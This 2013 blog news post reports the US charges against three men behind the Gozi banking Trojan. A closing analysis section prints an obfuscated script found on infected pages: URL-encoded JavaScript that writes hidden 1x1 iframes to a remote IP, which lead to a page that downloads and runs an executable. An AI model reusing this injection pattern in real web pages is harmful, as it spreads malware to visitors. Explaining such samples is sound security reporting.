Gotcha! U.S. accuses three people of Gozi Trojan bank raid spree – now seeking extradition

// January 24th, 2013 // Hacking and Security

Advertisements

Matrix ghost hacker manThe Gozi Trojan first surfaced in 2007 and was believed to have been active for months before being detected by AV vendors (some heuristic scanners would flag it as “suspicious”). Described as one of the most financially destructive computer viruses in history, the Gozi (pronounced goh-zee)Trojan was coded to “redesign” bank web pages allowing the hackers to obtain private information such as login credentials and three-factor authentication data. Over the years it has infected Microsoft Windows computers in the US, UK, Germany, Poland, France, Finland, Italy, Turkey and elsewhere. Gozi was distributed in various guises, most commonly disguised as a benign PDF document. The code was then rented out on a weekly basis through a business called “76 Service”, which was advertised on various underground cybercrime forums. Now the United States has accused three people of using the bank-account raiding Trojan to infect at least one million computers and steal millions of dollars.

Russian national Nikita Kuzmin, 25, Latvian resident Deniss Calovskis, 27, and Mihai Ionut Paunescu, a 28-year-old Romanian, were behind the scam, according to charges filed against them. The allegations were revealed in an indictment unsealed on Wednesday, 23 January. The US wants to extradite both Calovskis and Paunescu from their respective countries.

FBI Assistant Director-in-Charge George Venizelos said:

This long-term investigation uncovered an alleged international cybercrime ring whose far-reaching schemes infected at least one million computers worldwide and 40,000 in the US, and resulted in the theft or loss of tens of millions of dollars. Banking Trojans are to cyber criminals what safe-cracking or acetylene torches are to traditional bank burglars – but far more effective and less detectable. The investigation put an end to the Gozi virus.

According to the BBC:

Kuzmin, who masterminded the Trojan, was arrested in the US in November 2010 and pled guilty to various computer hacking and fraud charges in May 2011. Calovskis, who allegedly helped program Gozi, was arrested in Latvia in November 2012. Paunescu (AKA Virus) allegedly supplied the “bulletproof web hosting” service that helped Kuzmin and other crooks distribute the Trojan as well as ZeuS, SpyEye and other malware – some linked to spam distribution and DDoS shenanigans. Paunescu was arrested in Romania in December 2012.

Examination of the Gozi Trojan code

A typically infected machine would find the following in their browser cache.  A page with this script block:

<SCRIPT language=javascript> document.write(
unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%20
%68%74%74%70%3A%2F%2F%38%31%2E%31%35%2E%31%34%36
%2E%34%32%2F%69%6E%64%65%78%2E%68%74%6D%6C%20%66
%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%77
%69%64%74%68%3D%22%31%22%20%68%65%69%67%68%74%3D
%22%31%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E
%6F%22%20%6E%61%6D%65%3D%63%6F%75%6E%74%65%72%3E
%3C%2F%69%66%72%61%6D%65%3E' ) ) ;</SCRIPT>

Which writes the following content to the current web page:

Advertisements

<iframe src= http://81.15.146.42/index.html frameborder=”0″ width=”1″ height=”1″ scrolling=”no” name=counter></iframe>

That page simply contains another IFRAME:

<iframe src= http://81.15.146.42/counter.html frameborder=”0″ width=”1″ height=”1″ scrolling=”no” name=counter></iframe>

 

The page included in this last IFRAME contained JavaScript code using XMLHTTP and ADODB (ActiveX Data Objects) functions to download and run an EXE file which was hosted on the same server.

Sources: BBC, US Department of Justice
Advertisements
Geek wear at Ivy and Pearl Boutique




« « Previous Article: United States invites hackers – code for your country     » » Next Article: For anyone who thinks Twitter’s new Vine will die quickly we have two words – animated GIF


Leave a Reply

You must be logged in to post a comment.

%d bloggers like this: